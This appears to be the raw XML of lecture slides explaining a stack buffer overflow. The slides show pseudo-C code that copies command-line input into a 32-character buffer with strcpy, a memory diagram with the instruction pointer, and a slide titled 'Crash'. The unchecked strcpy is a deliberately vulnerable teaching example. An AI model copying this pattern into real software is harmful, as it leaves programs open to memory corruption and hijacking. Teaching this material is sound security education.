                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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D67E3C3-5953-4380-8F73-9F71921817FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182773" y="1825625"/>
            <a:ext cx="702874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0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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1: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2: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3:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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4: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5: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6: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7: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8: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5CFCED-5351-43CD-82C3-408E15AA8D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6998447" y="1825625"/>
            <a:ext cx="5010780" cy="46672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>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> ./print Hello World</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>World</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Hello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accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> ./print arg1 arg2 arg3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>arg3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>arg2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>arg1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4ED4215C-D80E-4307-A328-5424606FDA40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4509247" y="2683435"/>
            <a:ext cx="5788212" cy="830730"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -66058"/>
              <a:gd name="adj2" fmla="val 42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Copy the given string s into the new buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Speech Bubble: Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9A45FC0-856B-416A-99FF-4A0E82EDACCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054798" y="3595314"/>
            <a:ext cx="4842435" cy="830730"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73093"/>
              <a:gd name="adj2" fmla="val -619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Print the buffer to the console</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154441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29" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="1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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Normal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B7E7A-4158-4A3A-9991-2A74F262C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8113" y="1825625"/>
            <a:ext cx="6384373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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> print(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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s) {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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// only holds 32 characters, max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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> buffer[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>];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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(buffer, s);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puts(buffer);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18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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]);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2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9413956" y="365125"/>
            <a:ext cx="1256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Memory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E4E672-CDAA-485B-9583-9699C6DF79E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11340296" y="826790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2980C7-F5FE-4849-AB85-A7375AFA2548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11399966" y="6197293"/>
            <a:ext cx="568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369C03-1A8F-4186-9F55-472D98B5C2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722391" y="826790"/>
            <a:ext cx="0" cy="556305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CDC6264-C836-4FF5-9E0D-22D2C943BE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11366759" y="826790"/>
            <a:ext cx="0" cy="556305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D67E3C3-5953-4380-8F73-9F71921817FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941781" y="1825625"/>
            <a:ext cx="702874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0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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1: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2: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3:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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4: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5: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6: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7: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8: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5A080C8E-FFB2-4DB6-82F5-FE53CA42626B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250217" y="4159250"/>
            <a:ext cx="980105" cy="86512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F62BF2-F3FF-4D00-BE59-120561E20530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="1255059"/>
            <a:ext cx="2504140" cy="70522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argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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58FE83-725B-4D37-ABD4-021E0287CD35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="2035939"/>
            <a:ext cx="2504140" cy="40246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argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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88226CC-58DF-4A7F-BA11-36AF21EA00AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="3521889"/>
            <a:ext cx="2504140" cy="131088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buffer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8DB585E-751C-4FDD-9A5B-A85F7B19DE3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8016636" y="2232839"/>
            <a:ext cx="621041" cy="931710"/>
            <a:chOff x="7973123" y="2159723"/>
            <a:chExt cx="621041" cy="1345461"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Left Bracket 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8D45CC-5A52-493C-AB99-F7C144AE0D7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414872" y="2547880"/>
              <a:ext cx="179292" cy="698382"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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03EADBE-EC70-4A0C-8EB5-E410A92ACFC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7500447" y="2632399"/>
              <a:ext cx="13454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main()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A001156-8D8D-4DD5-9C0F-2A4C3E5C60C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8032486" y="3110809"/>
            <a:ext cx="605191" cy="1721962"/>
            <a:chOff x="7988973" y="2547879"/>
            <a:chExt cx="605191" cy="1209717"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Left Bracket 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADA7FCB-6917-4578-8649-A15085371812}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414872" y="2547879"/>
              <a:ext cx="179292" cy="1209717"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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BBB9F7A-3E34-4926-B407-BB1A4EBDC88D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7886815" y="2952683"/>
              <a:ext cx="6044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print()</a:t>
              </a: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7858E695-1AE5-40A2-81C6-A27A3CD39782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="2514057"/>
            <a:ext cx="2504140" cy="40246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IP = …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FC385A7-7B37-4C33-B4EA-D736063455BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="3061224"/>
            <a:ext cx="2504140" cy="40246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IP = 7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18353E-2F42-4851-8167-95FED5933379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="3669553"/>
            <a:ext cx="2502734" cy="1163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 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/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4A873CDD-8575-4CF5-B538-312F2377B25B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4767316" y="595957"/>
            <a:ext cx="2779054" cy="1557078"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71155"/>
              <a:gd name="adj2" fmla="val 406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What if the data in string s is longer than 32 characters?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Speech Bubble: Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C3EBDD4-A7E5-4594-89A5-A78E68148639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4762198" y="2650461"/>
            <a:ext cx="2779054" cy="1557078"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -68145"/>
              <a:gd name="adj2" fmla="val -20407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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>() does not check the length of the input!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93668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44444E-6 L 2.91667E-6 0.1138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0.11389 L 2.91667E-6 -0.38356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88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0.38356 L 2.91667E-6 -0.21574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0.21574 L 2.91667E-6 -0.10208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0.10208 L 2.91667E-6 0.22292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6" grpId="2" animBg="1"/>
      <p:bldP spid="16" grpId="3" animBg="1"/>
      <p:bldP spid="16" grpId="4" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="1" animBg="1"/>
      <p:bldP spid="31" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="1" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="1" animBg="1"/>
      <p:bldP spid="9" grpId="0" animBg="1"/>
      <p:bldP spid="29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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crash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B7E7A-4158-4A3A-9991-2A74F262C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8113" y="1825625"/>
            <a:ext cx="6384373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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> print(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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s) {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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// only holds 32 characters, max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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> buffer[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>];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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(buffer, s);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puts(buffer);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18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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]);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2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9413956" y="365125"/>
